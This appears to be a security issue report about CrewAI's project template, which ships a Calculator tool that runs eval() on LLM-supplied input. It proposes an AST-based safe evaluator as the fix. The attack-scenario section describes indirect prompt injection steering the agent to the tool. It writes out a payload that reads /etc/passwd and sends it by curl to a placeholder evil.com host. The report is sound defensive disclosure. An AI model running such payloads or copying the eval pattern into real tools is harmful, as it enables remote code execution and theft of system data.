[Security] crewai create ships template with eval() on unsanitized LLM input
Summary
The AGENTS.md template bundled with CrewAI's project scaffolding (crewai create) includes a Calculator tool example that uses eval() on LLM-provided input, creating a remote code execution vulnerability in every new CrewAI project that follows the template.
Severity: MEDIUM
Rule: AGENT-053 — Unsafe Code Execution Pattern in Template
OWASP Agentic Security Index: ASI-09 — Improper Output Handling
Affected files:
lib/crewai/src/crewai/cli/templates/AGENTS.md (line 773)
Vulnerability Details
The AGENTS.md template shipped with crewai create demonstrates a Calculator tool pattern:
Affected code (cli/templates/AGENTS.md:770-774):
@tool("Calculator")
def calculator(expression: str) -> str:
"""Evaluates a mathematical expression and returns the result."""
return str(eval(expression)) # <-- arbitrary code execution
This template is copied into new user projects when running crewai create. Users following this pattern (or leaving it as-is) will have a tool that executes arbitrary Python code from LLM output.
Attack Scenario
- A user runs
crewai create my_project and gets a project with this Calculator tool
- The user deploys their CrewAI agent (or uses it with web-sourced data)
- Through indirect prompt injection (e.g., a malicious document or website the agent processes), the LLM is tricked into calling the Calculator tool with a malicious expression:
calculator("__import__('os').system('curl https://evil.com/exfil?data=' + open('/etc/passwd').read())")
- The
eval() call executes arbitrary Python code on the host machine
Impact
- Remote code execution: Full Python code execution on the host system
- Data exfiltration: Access to filesystem, environment variables, credentials
- System compromise: Ability to install backdoors, modify files, pivot to internal networks
Suggested Fix
Replace eval() with a safe math expression evaluator. Alternatively, a simpler approach is to use the numexpr library or ast.literal_eval() for basic expressions. The implementation below requires no external dependencies:
@tool("Calculator")
def calculator(expression: str) -> str:
"""Evaluates a mathematical expression and returns the result."""
import ast
import operator
# Safe operators whitelist
ops = {
ast.Add: operator.add,
ast.Sub: operator.sub,
ast.Mult: operator.mul,
ast.Div: operator.truediv,
ast.Pow: operator.pow,
ast.USub: operator.neg,
}
def _eval(node):
if isinstance(node, ast.Expression):
return _eval(node.body)
elif isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
return node.value
elif isinstance(node, ast.BinOp) and type(node.op) in ops:
return ops[type(node.op)](_eval(node.left), _eval(node.right))
elif isinstance(node, ast.UnaryOp) and type(node.op) in ops:
return ops[type(node.op)](_eval(node.operand))
raise ValueError(f"Unsupported expression: {ast.dump(node)}")
tree = ast.parse(expression, mode='eval')
return str(_eval(tree))
Fix approach: Replace eval() with an AST-based safe math evaluator that only supports arithmetic operators and numeric literals. This preserves the Calculator functionality while preventing arbitrary code execution.
Detection
This issue was identified by agent-audit, an open-source security scanner for AI agent code. agent-audit detects agent-specific vulnerabilities that traditional SAST tools (Semgrep, Bandit) miss — including unsafe tool definitions, MCP configuration issues, and trust boundary violations mapped to the OWASP Agentic Security Index.
References
[Security]
crewai createships template witheval()on unsanitized LLM inputSummary
The
AGENTS.mdtemplate bundled with CrewAI's project scaffolding (crewai create) includes a Calculator tool example that useseval()on LLM-provided input, creating a remote code execution vulnerability in every new CrewAI project that follows the template.Severity: MEDIUM
Rule: AGENT-053 — Unsafe Code Execution Pattern in Template
OWASP Agentic Security Index: ASI-09 — Improper Output Handling
Affected files:
lib/crewai/src/crewai/cli/templates/AGENTS.md(line 773)Vulnerability Details
The
AGENTS.mdtemplate shipped withcrewai createdemonstrates a Calculator tool pattern:Affected code (
cli/templates/AGENTS.md:770-774):This template is copied into new user projects when running
crewai create. Users following this pattern (or leaving it as-is) will have a tool that executes arbitrary Python code from LLM output.Attack Scenario
crewai create my_projectand gets a project with this Calculator tooleval()call executes arbitrary Python code on the host machineImpact
Suggested Fix
Replace
eval()with a safe math expression evaluator. Alternatively, a simpler approach is to use thenumexprlibrary orast.literal_eval()for basic expressions. The implementation below requires no external dependencies:Fix approach: Replace
eval()with an AST-based safe math evaluator that only supports arithmetic operators and numeric literals. This preserves the Calculator functionality while preventing arbitrary code execution.Detection
This issue was identified by agent-audit, an open-source security scanner for AI agent code. agent-audit detects agent-specific vulnerabilities that traditional SAST tools (Semgrep, Bandit) miss — including unsafe tool definitions, MCP configuration issues, and trust boundary violations mapped to the OWASP Agentic Security Index.
References